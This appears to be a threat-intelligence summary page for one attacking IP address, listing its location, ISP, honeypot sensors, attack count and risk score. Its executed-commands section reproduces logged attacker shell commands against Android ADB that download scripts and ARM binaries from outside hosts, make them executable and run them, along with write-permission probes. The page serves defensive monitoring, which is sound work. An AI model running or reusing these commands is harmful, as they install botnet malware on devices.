Active Threat • HIGH
45.135.194.73
Country of Origin🇩🇪 Germany
First Detection1/2/2026
Last Activity1/14/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
4,357
Total Attacks
🔌
4
Ports
📡
3
Attack Types
🦠
1
Malware
Geolocation
- Country
- 🇩🇪 Germany
- City
- Unknown
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Attack Types
honeytrap
tanner
adbhoney
Attacked Ports
802323555537215
Associated Malware
Executed Commands
$
rm -rf /data/local/tmp/sys_helper3x$
ls -l /data/local/tmp/sys_helper3x$
cd /data/local/tmp/ ;rm -rf bins.sh; busybox wget http://45.135.194.7/bins.sh; sh bins.sh; curl http://45.135.194.7/bins.sh; sh bins.sh; wget http://45.135.194.7/bins.sh; sh bins.sh; busybox curl http://45.135.194.7/bins.sh; sh bins.sh2x$
touch /storage/emulated/0/.test_write; if [ -f /storage/emulated/0/.test_write ]; then echo WRITABLE; rm /storage/emulated/0/.test_write; fi1x$
touch /storage/sdcard0/.test_write; if [ -f /storage/sdcard0/.test_write ]; then echo WRITABLE; rm /storage/sdcard0/.test_write; fi1x$
touch /data/local/.test_write; if [ -f /data/local/.test_write ]; then echo WRITABLE; rm /data/local/.test_write; fi1x$
wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm71x$
cd /data/local/tmp/; rm -rf arm7*; busybox wget http://45.135.194.7/arm7; curl -O http://45.135.194.7/arm7; wget http://45.135.194.7/arm7; busybox curl -O http://45.135.194.7/arm7; chmod 777 arm7; ./arm7 adb1x$
curl -k -s -o /data/local/tmp/sys_helper http://196.251.100.100/arm71x$
busybox wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm71xRisk Assessment
70
/100
LowMediumHighCritical